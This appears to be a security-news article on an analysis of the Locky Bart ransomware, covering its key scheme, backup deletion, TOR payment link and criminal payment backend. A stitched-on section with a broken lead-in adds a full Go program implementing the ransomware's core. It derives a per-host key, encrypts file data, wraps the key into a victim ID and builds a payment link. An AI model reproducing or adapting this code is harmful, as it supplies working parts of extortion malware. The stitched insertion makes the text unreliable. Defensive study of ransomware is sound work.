Security researchers have completed an in-depth analysis of the infamous Locky Bart ransomware strain, which has been used to infect thousands of victims worldwide. Continue reading our article to find out more.
An In-depth Look Into The Locky Bart Ransomware
A team of malware researchers has shed some light on one of the well-known strains associated with the Locky family of viruses: the Bart ransomware. The report follows their analysis of the latest version of the threat, which is able to encrypt the target user's data without an active connection to the remote malicious C&C server.
A notable change between the new iteration of the virus and previous samples is that the backend servers appear to be maintained by hosts that are not directly affiliated with the criminal operators of the malware. In previous versions the Bart ransomware placed every affected file in a password-protected ZIP archive, and the weakness of that scheme allowed security researchers to create a decryption tool. Newer versions follow a new formula:
A unique master encryption key is created for every affected host.
The target user data is enumerated and encrypted.
The key used for the files is itself encrypted with the master key, which is tied to the victim's unique ID.
To prevent file recovery the encryption engine also deletes System Restore backups.
There are several important characteristics that set it apart from other viruses:
The Locky Bart ransomware gathers information from the infected machine to generate the unique encryption key. It then encrypts the master key with a public-private key pair; the private key is held only on the remote C&C server.
The ransomware drops a URL on the victim's machine containing a TOR link that carries the victim's ID. When the user visits it, the remote server harvests the encrypted unique identification code. By following this procedure the victims are in effect sending their encrypted decryption key to the criminals over the network, and only the criminals' private key can unwrap it.
The Locky Bart ransomware uses code virtualization, an anti-tampering technique primarily used for software protection: selected routines are translated into a custom bytecode that is interpreted at runtime, which makes static analysis and patching considerably harder.
The remote C&C server runs its own payment mechanism. When a payment is made, the funds are moved on to other wallets. The decryption application is generated automatically once the payment has been processed.
According to the security experts, the server side of the ransomware is designed to look and function like a legitimate business. Every victim (referred to as a user or customer) is given a support section that can be used to make contact with any concerns.
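The key-handling procedure described in the two lists above (per-host master key, file encryption, key wrapped with the operators' public key, encrypted ID carried in the TOR link), as an added worked example that is not code from the original article or from the malware itself. It implements the same hybrid structure in Go with the standard library: a SHA-256 hash over constructed machine information plus random bytes for the per-host key, AES-256-GCM for the data and RSA-OAEP to wrap the host key into the victim ID. The article does not name the actual primitives, only the structure, so the choice of AES-GCM and RSA-OAEP, the hostname/GUID field set, the placeholder .onion hostname and all function names are assumptions made for this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
)

// DeriveHostKey builds the per-host master key offline from machine data
// (here a hostname and machine GUID, an assumed field set) plus fresh random
// bytes, so no C&C round-trip is needed and no two hosts share a key.
func DeriveHostKey(hostname, machineGUID string, entropy []byte) []byte {
	h := sha256.New()
	h.Write([]byte(hostname + "\x00" + machineGUID + "\x00"))
	h.Write(entropy)
	return h.Sum(nil) // 32 bytes, used directly as an AES-256 key
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptBlob encrypts one file body under the host key; output is nonce||ct||tag.
func EncryptBlob(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// DecryptBlob reverses EncryptBlob and fails authentication under a wrong key.
func DecryptBlob(key, data []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if len(data) < gcm.NonceSize() {
		return nil, errors.New("ciphertext too short")
	}
	return gcm.Open(nil, data[:gcm.NonceSize()], data[gcm.NonceSize():], nil)
}

// WrapHostKey encrypts the host key to the operators' public key (RSA-OAEP)
// and encodes it as the victim ID carried in the payment URL.
func WrapHostKey(pub *rsa.PublicKey, hostKey []byte) (string, error) {
	ct, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, hostKey, nil)
	if err != nil {
		return "", err
	}
	return base64.RawURLEncoding.EncodeToString(ct), nil
}

// UnwrapHostKey is the backend side: only the private-key holder can turn
// the victim ID back into the host key.
func UnwrapHostKey(priv *rsa.PrivateKey, victimID string) ([]byte, error) {
	ct, err := base64.RawURLEncoding.DecodeString(victimID)
	if err != nil {
		return nil, err
	}
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ct, nil)
}

// PaymentURL is the link dropped on the victim machine; the hostname is a
// placeholder, not a real onion address.
func PaymentURL(victimID string) string {
	return "http://PLACEHOLDER-ONION-HOST.onion/?id=" + victimID
}

func main() {
	priv, _ := rsa.GenerateKey(rand.Reader, 2048) // stays on the backend
	entropy := make([]byte, 16)
	io.ReadFull(rand.Reader, entropy)
	// Victim side, entirely offline: derive, encrypt, wrap (constructed input).
	hostKey := DeriveHostKey("WS-042", "constructed-guid-0001", entropy)
	blob, _ := EncryptBlob(hostKey, []byte("constructed sample document"))
	victimID, _ := WrapHostKey(&priv.PublicKey, hostKey)
	fmt.Println("ransom note link:", PaymentURL(victimID))
	// Visiting the link delivers victimID to the backend, which unwraps it.
	recovered, _ := UnwrapHostKey(priv, victimID)
	pt, err := DecryptBlob(recovered, blob)
	fmt.Printf("backend decrypt: %q err=%v\n", pt, err)
}
```

The difference from the earlier ZIP variant is where the secret lives: the host key is still generated locally, but it is only ever persisted in wrapped form, so a victim who has the ID, the ciphertext and the full sample still has nothing to attack except the public-key wrapping and AES-256 itself. That is why a free decryptor for this design depends on the operators' private key leaking, and why offline backups, not password recovery, are the practical defence.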